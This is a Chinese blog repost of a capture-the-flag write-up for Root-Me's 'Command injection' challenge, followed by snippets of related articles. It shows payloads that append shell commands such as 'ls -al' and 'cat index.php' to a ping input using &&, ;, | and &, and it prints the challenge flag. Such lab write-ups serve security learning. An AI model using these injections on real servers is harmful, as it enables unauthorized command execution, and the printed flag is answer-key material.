RootMe--Command injection

最新推荐文章于 2020-01-05 21:18:50 发布
最新推荐文章于 2020-01-05 21:18:50 发布
阅读量229 收藏 1
点赞数
文章标签: php 操作系统
原文链接:http://www.cnblogs.com/yuuki-aptx/p/10644683.html
版权

 

题目链接:https://www.root-me.org/en/Challenges/Web-Server/Command-injection

 

题目给了提示:

1. 命令注入  2. flag在index.php

打开题目后一个输入框,先输入127.0.0.1,发现是显示ping某个IP的网络状况。

尝试用连接符&& 查询下有哪些文件目录

127.0.0.1 && ls -al

发现了 index.php 

构造payload查看index.php的内容

127.0.0.1 & cat index.php
127.0.0.1 && cat index.php
127.0.0.1 | cat index.php
127.0.0.1 , cat index.php
127.0.0.1 ; cat index.php

这5个在windows下都可以运行,不过Linux下连接符必须得用 &&,单个&不行 

提交后出现了两个输入框

查看源码发现flag在里面

flag:S3rv1ceP1n9Sup3rS3cure

 

转载于:https://www.cnblogs.com/yuuki-aptx/p/10644683.html

weixin_34061482
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Rootme-WriteUp:来自tryhackme的RootME文章
04-13
RootME-tryhackme通过0xRar扫描nmap -T4 -A -p- MACHINE_IPNmap scan report for MACHINE_IPHost is up (0.15s latency).Not shown: 65464 closed ports, 69 filtered portsPORT STATE SERVICE VERSION22/tcp open ...
CTF-rootme 题解之Perl - Command injection
weixin_30587927的博客
03-27 403
LINK:https://www.root-me.org/en/Challenges/App-Script/Perl-Command-injection Referrence:http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html      https://www.cnblogs.com/softidea/p/396...
CTF - RootMe解题报告(持续更新中)
ζёСяêτ - 小優YoU
01-05 8398
完整原文(实时更新):http://exp-blog.com/2019/01/02/pid-2597/ (转载请注明出处,仅供分享学习,严禁用于商业用途) 官网入口:Root-Me(https://www.root-me.org) 注:  在解题过程,官方按不同的挑战主题提供了一些工具包,建议按需善用。这里也推荐一些挑战过程中会经常用到的工具:  ① Burp Suite:攻城利器,谁用谁...
Command Injection(命令行注入)
kid的博客
05-06 2万+
Command Injection(命令行注入) 前言 主要集合dvwa对命令行注入进行学习 内容比较基础简单 练习 Low 可以看到这是一个可以输入ip,测试连通性的界面 我觉得这个看代码来审计就很清楚了,这里我们输入(这里是Linux系统)会与’ping -c 4’拼接在一起,然后当做命令执行…这就给了我们很大的操作空间 && 可以用来执行多条命令 可以看到这里我加上 &...
Command Injection(命令注入)
sh0rk的博客
11-17 4693
Command Injection(命令注入)什么是命令注入利用方法判断步骤使用进阶防御 什么是命令注入 恶意用户通过构造请求,对于一些执行系统命令的功能点进行构造注入,本质上是数据与代码未分离。对于特殊的需求没有对请求进行过滤,导致绕过从而导致注入。 利用方法 判断步骤 判断是否执行系统命令 判断函数或函数的参数是否可控判断函数或函数的参数是否可控 判断是否拼接注入命令判断是否拼接注入命令 ...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all
04-30
该压缩包"JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"可能包含了一个JNDI注入攻击的示例或者测试工具,"SNAPSHOT"通常表示这是一个开发中的版本,可能尚未经过完整测试,因此可能存在漏洞或不稳定性。使用这样的...
3.Root-MUSIC算法MATLAB程序_root-music_ROOT_
09-28
Root-MUSIC(Root Multiple Signal Classification)算法是一种在信号处理领域广泛应用的估计参数方法,主要用于方向-of-arrival (DOA)估计。它是由Paul V. Swerling、John R. Schnabel和Rudolf E. Kalman等人在1986...
ROOT-MUSIC 算法仿真
03-26
ROOT-music算法, 内含MUSIC时间对比,不相干信号仿真
Untitled_Root-MUSIC算法_ROOT_
10-01
标题"Untitled_Root-MUSIC算法_ROOT_"提及了"Root-MUSIC算法",这是一项在信号处理领域广泛使用的空间谱估计算法,尤其在阵列信号处理中有着重要应用。"ROOT"可能指的是这个算法的优化版本或者在ROOT数据处理框架中...
RootMe--HTTP - POST
weixin_34253539的博客
04-03 744
题目链接:https://www.root-me.org/en/Challenges/Web-Server/HTTP-POST 打开题目有一个Give a try!的框,点击让分数超过999999。 不管怎么点分数都超不过,按F12找到Elements下面发现有一个函数 可直接修改方框里的内容,使其超过999999。然后点击方框得到flag flag:H7tp_h4s_N0_...
DVWA系列(四)----Command Injection (命令行注入)
热门推荐
fendo
02-10 2万+
一、攻击模块2:Command Injection(命令注入)       命令注入攻击的常见模式为:仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。        PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeC
web for pentester之command injection
Jone_Dom的博客
05-05 784
web for pentester之命令执行漏洞 (命令执行漏洞) 开启pentester虚拟机: 开启之后,输入ipconfig查看虚拟机ip地址;我这里虚拟机的ip地址为192.168.145.131; 在物理机上的Firefox地址栏中输http://192.168.145.131 进入web for pentester主页: 点击选择Commands injection(命令执行)测试...
CG-CTF-Web-GBK Injection
1stPeak's Blog
07-01 1295
GBK Injection 1.题目 2.首先我们进入题目地址,发现下图所示,首先猜测可能存在sql注入 3.于是我们尝试',但被转义了 4.被转义了,那咋办,此时,想到了URL中%df与\结合会变成運,如下图 5.因此我们可以闭合id的值,使用#,--空格或--+来注释最后一个’ 这里对#进行了过滤,但我们可以使用%23进行绕过 –空格也是标准的SQl注释语句,但这里对空格进行了过滤,...
CTF-web 第十三部分 命令注入
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
CTF关于ping命令注入问题(1)
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&&’ ‘&’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
mysql -u root -p 显示command not found
最新发布
06-08
/usr/local/mysql/bin/mysql -u root -p ``` 这个命令会使用找到的路径来执行mysql命令。 4. 如果你还是无法解决这个问题,可以考虑重新安装MySQL,并确保在安装过程中添加了系统的PATH环境变量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值